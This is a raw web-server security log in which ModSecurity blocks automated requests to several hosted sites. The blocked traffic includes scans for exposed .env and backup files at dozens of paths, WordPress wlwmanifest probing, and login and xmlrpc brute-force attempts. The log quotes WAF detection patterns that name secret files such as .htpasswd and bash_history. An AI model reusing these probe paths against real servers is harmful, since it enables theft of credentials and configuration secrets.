[Tue May 26 15:48:59.191807 2026] [security2:error] [pid 747840:tid 748009] [client 35.199.175.60:55118] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "quincaillerie.azurmediatec.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVzk4m6MwAuYuZKxvns3gAAATE"]
[Tue May 26 15:48:59.477490 2026] [security2:error] [pid 745492:tid 745723] [client 35.199.175.60:51282] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "quincaillerie.azurmediatec.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVzk4mEQglTmoWcfxJ6LQAAAOc"]
[Tue May 26 15:48:59.650184 2026] [security2:error] [pid 747840:tid 748057] [client 35.199.175.60:56782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "quincaillerie.azurmediatec.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVzk4m6MwAuYuZKxvns6QAAAWE"]
[Tue May 26 15:48:59.843279 2026] [security2:error] [pid 747840:tid 748014] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/.vscode/.env"] [unique_id "ahVzk4m6MwAuYuZKxvns7QAAATY"]
[Tue May 26 15:48:59.846978 2026] [security2:error] [pid 745492:tid 745680] [client 35.199.175.60:61530] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "quincaillerie.azurmediatec.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVzk4mEQglTmoWcfxJ6LgAAALw"]
[Tue May 26 15:49:00.011619 2026] [security2:error] [pid 747840:tid 747992] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/js/.env"] [unique_id "ahVzlIm6MwAuYuZKxvns9QAAASA"]
[Tue May 26 15:49:00.073070 2026] [security2:error] [pid 747840:tid 748017] [client 35.199.175.60:61111] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "quincaillerie.azurmediatec.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVzlIm6MwAuYuZKxvns9gAAATk"]
[Tue May 26 15:49:00.194592 2026] [security2:error] [pid 747840:tid 748045] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/laravel/.env"] [unique_id "ahVzlIm6MwAuYuZKxvns9wAAAVU"]
[Tue May 26 15:49:00.354185 2026] [security2:error] [pid 747840:tid 747980] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/laravel/core/.env"] [unique_id "ahVzlIm6MwAuYuZKxvns-wAAARQ"]
[Tue May 26 15:49:00.374026 2026] [security2:error] [pid 747840:tid 748039] [client 35.199.175.60:60360] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "quincaillerie.azurmediatec.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVzlIm6MwAuYuZKxvns_AAAAU8"]
[Tue May 26 15:49:00.557416 2026] [security2:error] [pid 747840:tid 748006] [client 35.199.175.60:50077] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "quincaillerie.azurmediatec.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVzlIm6MwAuYuZKxvntAgAAAS4"]
[Tue May 26 15:49:00.585862 2026] [security2:error] [pid 747840:tid 748096] [client 143.110.243.118:39592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/ccx/index.php"] [unique_id "ahVzlIm6MwAuYuZKxvntBgAAAYg"]
[Tue May 26 15:49:00.669549 2026] [security2:error] [pid 747840:tid 747989] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/mail/.env"] [unique_id "ahVzlIm6MwAuYuZKxvntCQAAAR0"]
[Tue May 26 15:49:00.859173 2026] [security2:error] [pid 747840:tid 747970] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/mailer/.env"] [unique_id "ahVzlIm6MwAuYuZKxvntCgAAAQo"]
[Tue May 26 15:49:00.940696 2026] [security2:error] [pid 747840:tid 747972] [client 85.208.96.204:15614] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahVzlIm6MwAuYuZKxvntDgAAAQw"]
[Tue May 26 15:49:00.940800 2026] [security2:error] [pid 747840:tid 747972] [client 85.208.96.204:15614] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahVzlIm6MwAuYuZKxvntDgAAAQw"]
[Tue May 26 15:49:00.955375 2026] [security2:error] [pid 747840:tid 748049] [client 35.199.175.60:49155] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "quincaillerie.azurmediatec.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVzlIm6MwAuYuZKxvntEQAAAVk"]
[Tue May 26 15:49:01.100330 2026] [security2:error] [pid 747840:tid 748072] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/nginx/.env"] [unique_id "ahVzlYm6MwAuYuZKxvntFQAAAXA"]
[Tue May 26 15:49:01.249496 2026] [security2:error] [pid 747840:tid 748059] [client 185.191.171.8:21796] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVzlYm6MwAuYuZKxvntGgAAAWM"]
[Tue May 26 15:49:01.249671 2026] [security2:error] [pid 747840:tid 748059] [client 185.191.171.8:21796] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVzlYm6MwAuYuZKxvntGgAAAWM"]
[Tue May 26 15:49:01.278985 2026] [security2:error] [pid 747840:tid 748002] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/public/.env"] [unique_id "ahVzlYm6MwAuYuZKxvntHQAAASo"]
[Tue May 26 15:49:01.301962 2026] [security2:error] [pid 745492:tid 745638] [client 35.199.175.60:64831] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "quincaillerie.azurmediatec.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVzlYmEQglTmoWcfxJ6OAAAAJI"]
[Tue May 26 15:49:01.395172 2026] [security2:error] [pid 747840:tid 747975] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzlIm6MwAuYuZKxvntDQAAAQ8"]
[Tue May 26 15:49:01.479345 2026] [security2:error] [pid 747840:tid 748075] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/site/.env"] [unique_id "ahVzlYm6MwAuYuZKxvntJAAAAXM"]
[Tue May 26 15:49:01.640880 2026] [security2:error] [pid 747840:tid 747995] [client 103.153.130.62:49472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzlYm6MwAuYuZKxvntJQAAASM"]
[Tue May 26 15:49:01.640986 2026] [security2:error] [pid 747840:tid 747995] [client 103.153.130.62:49472] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzlYm6MwAuYuZKxvntJQAAASM"]
[Tue May 26 15:49:01.695982 2026] [security2:error] [pid 747840:tid 748057] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/xampp/.env"] [unique_id "ahVzlYm6MwAuYuZKxvntJgAAAWE"]
[Tue May 26 15:49:01.895092 2026] [security2:error] [pid 747840:tid 747997] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/main/.env"] [unique_id "ahVzlYm6MwAuYuZKxvntKQAAASU"]
[Tue May 26 15:49:02.032316 2026] [security2:error] [pid 747840:tid 748093] [client 62.60.130.233:55433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "athelstan.org.in.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVzlYm6MwAuYuZKxvntKgAAAYU"], referer: https://www.google.fr/search?q=wordpress
[Tue May 26 15:49:02.112052 2026] [security2:error] [pid 747840:tid 747992] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/node_modules/.env"] [unique_id "ahVzlom6MwAuYuZKxvntMQAAASA"]
[Tue May 26 15:49:02.365300 2026] [security2:error] [pid 747840:tid 748008] [client 45.148.10.159:42956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/kyc/.env"] [unique_id "ahVzlom6MwAuYuZKxvntNAAAATA"]
[Tue May 26 15:49:02.369127 2026] [security2:error] [pid 747840:tid 748045] [client 62.60.130.233:64994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "athelstan.org.in.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVzlom6MwAuYuZKxvntNQAAAVU"], referer: https://www.reddit.com/
[Tue May 26 15:49:02.990798 2026] [security2:error] [pid 747840:tid 748051] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzlom6MwAuYuZKxvntOwAAAVs"]
[Tue May 26 15:49:04.169489 2026] [security2:error] [pid 747840:tid 748009] [client 160.119.76.58:52126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVzmIm6MwAuYuZKxvntagAAATE"]
[Tue May 26 15:49:04.634342 2026] [security2:error] [pid 747840:tid 748061] [client 160.119.76.58:52134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclubbanquet.com"] [uri "/wp-login.php"] [unique_id "ahVzmIm6MwAuYuZKxvntdQAAAWU"]
[Tue May 26 15:49:04.707143 2026] [security2:error] [pid 747840:tid 748053] [client 45.148.10.159:42968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/prod/.env"] [unique_id "ahVzmIm6MwAuYuZKxvnteAAAAV0"]
[Tue May 26 15:49:04.915471 2026] [security2:error] [pid 747840:tid 748012] [client 45.148.10.159:42968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/.env.bak"] [unique_id "ahVzmIm6MwAuYuZKxvntfAAAATQ"]
[Tue May 26 15:49:05.555040 2026] [security2:error] [pid 747840:tid 748084] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzmYm6MwAuYuZKxvnthAAAAXw"]
[Tue May 26 15:49:06.602367 2026] [security2:error] [pid 747840:tid 747860] [remote 51.91.98.45:53878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVzmom6MwAuYuZKxvntoAABdhM"]
[Tue May 26 15:49:06.750027 2026] [security2:error] [pid 745492:tid 745712] [client 223.123.35.44:36227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzmomEQglTmoWcfxJ6ZwAAANw"]
[Tue May 26 15:49:06.750137 2026] [security2:error] [pid 745492:tid 745712] [client 223.123.35.44:36227] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzmomEQglTmoWcfxJ6ZwAAANw"]
[Tue May 26 15:49:06.752755 2026] [security2:error] [pid 747840:tid 748056] [client 185.191.171.1:49078] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-2nd/list/"] [unique_id "ahVzmom6MwAuYuZKxvntoQAAAWA"]
[Tue May 26 15:49:06.752842 2026] [security2:error] [pid 747840:tid 748056] [client 185.191.171.1:49078] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-2nd/list/"] [unique_id "ahVzmom6MwAuYuZKxvntoQAAAWA"]
[Tue May 26 15:49:07.735879 2026] [security2:error] [pid 745492:tid 745678] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzm4mEQglTmoWcfxJ6cgAAALo"]
[Tue May 26 15:49:07.935091 2026] [security2:error] [pid 745492:tid 745747] [client 45.148.10.159:42980] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/website/.env"] [unique_id "ahVzm4mEQglTmoWcfxJ6fQAAAP8"]
[Tue May 26 15:49:08.093278 2026] [security2:error] [pid 745492:tid 745751] [client 45.148.10.159:42980] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/development/.env"] [unique_id "ahVznImEQglTmoWcfxJ6fgAAAQM"]
[Tue May 26 15:49:08.268733 2026] [security2:error] [pid 745492:tid 745710] [client 45.148.10.159:42980] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/backend/.env"] [unique_id "ahVznImEQglTmoWcfxJ6fwAAANo"]
[Tue May 26 15:49:08.439137 2026] [security2:error] [pid 745492:tid 745715] [client 45.148.10.159:42980] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/api/shared/config/.env"] [unique_id "ahVznImEQglTmoWcfxJ6gwAAAN8"]
